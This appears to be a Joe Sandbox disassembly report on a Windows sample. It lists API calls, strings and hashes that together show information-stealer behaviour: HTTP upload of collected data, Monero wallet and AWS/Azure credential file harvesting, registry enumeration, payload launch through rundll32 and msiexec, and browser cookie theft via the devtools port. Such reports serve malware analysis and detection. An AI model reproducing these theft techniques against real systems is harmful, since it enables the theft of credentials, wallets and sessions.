Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CD4889
Part of subcall function 00CD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CD4899

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00CD5A48
StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD5A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CD5BE3
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0159E470,00000000,?,01599D08,00000000,?,00CF1B4C), ref: 00CD5EC1
lstrlen.KERNEL32(00000000), ref: 00CD5ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00CD5EE3
RtlAllocateHeap.NTDLL(00000000), ref: 00CD5EEA
lstrlen.KERNEL32(00000000), ref: 00CD5EFF
lstrlen.KERNEL32(00000000), ref: 00CD5F28
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00CD5F41
lstrlen.KERNEL32(00000000,?,?), ref: 00CD5F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00CD5F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00CD5F9C
InternetCloseHandle.WININET(00000000), ref: 00CD6000
InternetCloseHandle.WININET(00000000), ref: 00CD600D
HttpOpenRequestA.WININET(00000000,0159E560,?,0159D9F8,00000000,00000000,00400100,00000000), ref: 00CD5C48

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

InternetCloseHandle.WININET(00000000), ref: 00CD6017

Strings

", xrefs: 00CD5D25
------, xrefs: 00CD5AE6
", xrefs: 00CD5E66
------, xrefs: 00CD5D9C
------, xrefs: 00CD5C5B

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 16f1fc5234ee805428412b63eb85278492c31be95cdccff3dfbd926b2624a456
Instruction ID: 25fecc90249e9bdaedc8f8973587c47cf523c8d58612498127975a7a62028a1e
Opcode Fuzzy Hash: 16f1fc5234ee805428412b63eb85278492c31be95cdccff3dfbd926b2624a456
Instruction Fuzzy Hash: ED12E8B2D20158AFCB15EBA1DCA6FEEB379BF14700F1141A9B10662191EF703A48DF65

Function 00CDCFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00CDD083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00CDD1C7
RtlAllocateHeap.NTDLL(00000000), ref: 00CDD1CE
lstrcat.KERNEL32(?,00000000), ref: 00CDD308
lstrcat.KERNEL32(?,00CF1570), ref: 00CDD317
lstrcat.KERNEL32(?,00000000), ref: 00CDD32A
lstrcat.KERNEL32(?,00CF1574), ref: 00CDD339
lstrcat.KERNEL32(?,00000000), ref: 00CDD34C
lstrcat.KERNEL32(?,00CF1578), ref: 00CDD35B
lstrcat.KERNEL32(?,00000000), ref: 00CDD36E
lstrcat.KERNEL32(?,00CF157C), ref: 00CDD37D
lstrcat.KERNEL32(?,00000000), ref: 00CDD390
lstrcat.KERNEL32(?,00CF1580), ref: 00CDD39F
lstrcat.KERNEL32(?,00000000), ref: 00CDD3B2
lstrcat.KERNEL32(?,00CF1584), ref: 00CDD3C1
lstrcat.KERNEL32(?,00000000), ref: 00CDD3D4
lstrcat.KERNEL32(?,00CF1588), ref: 00CDD3E3

Part of subcall function 00CEAB30: lstrlen.KERNEL32(00CD4F55,?,?,00CD4F55,00CF0DDF), ref: 00CEAB3B
Part of subcall function 00CEAB30: lstrcpy.KERNEL32(00CF0DDF,00000000), ref: 00CEAB95

lstrlen.KERNEL32(?), ref: 00CDD42A
lstrlen.KERNEL32(?), ref: 00CDD439

Part of subcall function 00CEAD80: StrCmpCA.SHLWAPI(00000000,00CF1568,00CDD2A2,00CF1568,00000000), ref: 00CEAD9F

DeleteFileA.KERNEL32(00000000), ref: 00CDD4B4

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 8564cd9b7aaa3b37018af5cc029370c2d73eb09d5274710896468d73e25aae5b
Instruction ID: 8fb1742d1a629bad2751b215db4192212c17725a3054c796e2bcfba4237d93a5
Opcode Fuzzy Hash: 8564cd9b7aaa3b37018af5cc029370c2d73eb09d5274710896468d73e25aae5b
Instruction Fuzzy Hash: 33E12EB2D10248AFCB04FBA1DD96EEE7379AF55301F114558F106B61A1DF31BA08EB62

Function 00CDCA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0159CD90,00000000,?,00CF1544,00000000,?,?), ref: 00CDCB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00CDCB89
GetFileSize.KERNEL32(00000000,00000000), ref: 00CDCB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CDCBA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00CDCBD9
StrStrA.SHLWAPI(?,0159CBB0,00CF0B56), ref: 00CDCBF7
StrStrA.SHLWAPI(00000000,0159CC70), ref: 00CDCC1E
StrStrA.SHLWAPI(?,0159D3F8,00000000,?,00CF1550,00000000,?,00000000,00000000,?,01598A80,00000000,?,00CF154C,00000000,?), ref: 00CDCDA2
StrStrA.SHLWAPI(00000000,0159D4D8), ref: 00CDCDB9

Part of subcall function 00CDC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00CDC971
Part of subcall function 00CDC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00CDC97C

StrStrA.SHLWAPI(?,0159D4D8,00000000,?,00CF1554,00000000,?,00000000,01598AC0), ref: 00CDCE5A
StrStrA.SHLWAPI(00000000,015989A0), ref: 00CDCE71

Part of subcall function 00CDC920: lstrcat.KERNEL32(?,00CF0B47), ref: 00CDCA43
Part of subcall function 00CDC920: lstrcat.KERNEL32(?,00CF0B4B), ref: 00CDCA57
Part of subcall function 00CDC920: lstrcat.KERNEL32(?,00CF0B4E), ref: 00CDCA78

lstrlen.KERNEL32(00000000), ref: 00CDCF44
CloseHandle.KERNEL32(00000000), ref: 00CDCF9C

Strings

, xrefs: 00CDCAC6

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
String ID:
API String ID: 3744635739-3916222277
Opcode ID: f4e3d9ec61cc8b0b65855e475d8f1dfb94f6be8647b1689f44fa9b6f8b92cddd
Instruction ID: 1fb3bbaceaca1951834f4857ee29983b65fc50e79eb3980d7d7d65c0371ef709
Opcode Fuzzy Hash: f4e3d9ec61cc8b0b65855e475d8f1dfb94f6be8647b1689f44fa9b6f8b92cddd
Instruction Fuzzy Hash: 3DE10AB2D10148AFCB14EBA5DCA2FEEB779AF54300F0141A9F106A7191EF317A49DB61

Function 00CE84B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

RegOpenKeyExA.ADVAPI32(00000000,0159AD80,00000000,00020019,00000000,00CF05BE), ref: 00CE8534
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00CE85B6
wsprintfA.USER32 ref: 00CE85E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00CE860B
RegCloseKey.ADVAPI32(00000000), ref: 00CE861C
RegCloseKey.ADVAPI32(00000000), ref: 00CE8629

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Strings

?, xrefs: 00CE850A
- , xrefs: 00CE8733
%s\%s, xrefs: 00CE85DD

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 6f1a0249f4a9ab883d508a273cf1dd53deb12d713ee928c9ae9d3c6dac10bd91
Instruction ID: 46d006681cc25da8f9df2e765f844f22e784291c288705d2a25acfb0562956c1
Opcode Fuzzy Hash: 6f1a0249f4a9ab883d508a273cf1dd53deb12d713ee928c9ae9d3c6dac10bd91
Instruction Fuzzy Hash: FE81FCB191125CAFDB24DB55CD95FEA77B8BB48700F1082D8F109A6190DF716B88DFA0

Function 00CE4FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CE8F9B

lstrcat.KERNEL32(?,00000000), ref: 00CE5000
lstrcat.KERNEL32(?,\.azure\), ref: 00CE501D

Part of subcall function 00CE4B60: wsprintfA.USER32 ref: 00CE4B7C
Part of subcall function 00CE4B60: FindFirstFileA.KERNEL32(?,?), ref: 00CE4B93

lstrcat.KERNEL32(?,00000000), ref: 00CE508C
lstrcat.KERNEL32(?,\.aws\), ref: 00CE50A9

Part of subcall function 00CE4B60: StrCmpCA.SHLWAPI(?,00CF0FC4), ref: 00CE4BC1
Part of subcall function 00CE4B60: StrCmpCA.SHLWAPI(?,00CF0FC8), ref: 00CE4BD7
Part of subcall function 00CE4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00CE4DCD
Part of subcall function 00CE4B60: FindClose.KERNEL32(000000FF), ref: 00CE4DE2

lstrcat.KERNEL32(?,00000000), ref: 00CE5118
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00CE5135

Part of subcall function 00CE4B60: wsprintfA.USER32 ref: 00CE4C00
Part of subcall function 00CE4B60: StrCmpCA.SHLWAPI(?,00CF08D3), ref: 00CE4C15
Part of subcall function 00CE4B60: wsprintfA.USER32 ref: 00CE4C32
Part of subcall function 00CE4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00CE4C6E
Part of subcall function 00CE4B60: lstrcat.KERNEL32(?,0159E550), ref: 00CE4C9A
Part of subcall function 00CE4B60: lstrcat.KERNEL32(?,00CF0FE0), ref: 00CE4CAC
Part of subcall function 00CE4B60: lstrcat.KERNEL32(?,?), ref: 00CE4CC0
Part of subcall function 00CE4B60: lstrcat.KERNEL32(?,00CF0FE4), ref: 00CE4CD2
Part of subcall function 00CE4B60: lstrcat.KERNEL32(?,?), ref: 00CE4CE6
Part of subcall function 00CE4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00CE4CFC
Part of subcall function 00CE4B60: DeleteFileA.KERNEL32(?), ref: 00CE4D81

Strings

\.aws\, xrefs: 00CE509D
*.*, xrefs: 00CE5028
Azure\.IdentityService, xrefs: 00CE513B
*.*, xrefs: 00CE50B4
\.IdentityService\, xrefs: 00CE5129
msal.cache, xrefs: 00CE5140
\.azure\, xrefs: 00CE5011
Azure\.aws, xrefs: 00CE50AF
Azure\.azure, xrefs: 00CE5023

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 562f6e3b4c89452b180eed6a579e5da193b7f3eb3462ca189b4f6fd5ac3b9f7e
Instruction ID: 3a7b3b4aea75e75f5a1cb1902e12af9eb2aa7d271a506d058090a2f6cabe3eab
Opcode Fuzzy Hash: 562f6e3b4c89452b180eed6a579e5da193b7f3eb3462ca189b4f6fd5ac3b9f7e
Instruction Fuzzy Hash: 5A4180BAA40308A7DB54F7B0EC97FED73385B65700F0045A4B649660C2EEB567C89B92

Function 00CE91A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00CE91FC

Strings

image/jpeg, xrefs: 00CE92C6

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CreateGlobalStream
String ID: image/jpeg
API String ID: 2244384528-3785015651
Opcode ID: 7bdb4ea6956597cd3531e9b912a5601b32591573b182e6e6a390996c59032a40
Instruction ID: 05253b057b02cc577dedaf258dd7923d5170e0096fba93af7dd2b293f85b943a
Opcode Fuzzy Hash: 7bdb4ea6956597cd3531e9b912a5601b32591573b182e6e6a390996c59032a40
Instruction Fuzzy Hash: 1D71CAB1A14208ABDB14EFE5DC85FEEB7B8AF48700F108509F616A7290DB34A904DB60

Function 00CE3080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

ShellExecuteEx.SHELL32(0000003C), ref: 00CE3415
ShellExecuteEx.SHELL32(0000003C), ref: 00CE35AD
ShellExecuteEx.SHELL32(0000003C), ref: 00CE373A

Strings

C:\Windows\system32\msiexec.exe, xrefs: 00CE370F
.dll, xrefs: 00CE3435
"" , xrefs: 00CE32EA
<, xrefs: 00CE36E0
.msi, xrefs: 00CE35E8
/i ", xrefs: 00CE3634
/passive, xrefs: 00CE36AB
C:\Windows\system32\rundll32.exe, xrefs: 00CE3582

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: ExecuteShell$lstrcpy
String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
API String ID: 2507796910-3625054190
Opcode ID: 618a652d77efabede746762b2e095b430d0fa7c696a9a22f213118287deb8a7e
Instruction ID: 372932fa816a5b52e6c27f03e8e398470b314563b3634e45a80281cb0875d5a4
Opcode Fuzzy Hash: 618a652d77efabede746762b2e095b430d0fa7c696a9a22f213118287deb8a7e
Instruction Fuzzy Hash: 12120C72D101889FCB14EBA1DDA2FEDB739AF24300F1145A9E10666192EF353B49DF62

Function 00CD9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD9A50: InternetOpenA.WININET(00CF0AF6,00000001,00000000,00000000,00000000), ref: 00CD9A6A

lstrcat.KERNEL32(?,cookies), ref: 00CD9CAF
lstrcat.KERNEL32(?,00CF12C4), ref: 00CD9CC1
lstrcat.KERNEL32(?,?), ref: 00CD9CD5
lstrcat.KERNEL32(?,00CF12C8), ref: 00CD9CE7
lstrcat.KERNEL32(?,?), ref: 00CD9CFB
lstrcat.KERNEL32(?,.txt), ref: 00CD9D0D
lstrlen.KERNEL32(00000000), ref: 00CD9D17
lstrlen.KERNEL32(00000000), ref: 00CD9D26

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Strings

ws://localhost:9229, xrefs: 00CD9C3C
cookies, xrefs: 00CD9CA3
/devtools, xrefs: 00CD9C0B
localhost, xrefs: 00CD9BF5
.txt, xrefs: 00CD9D01

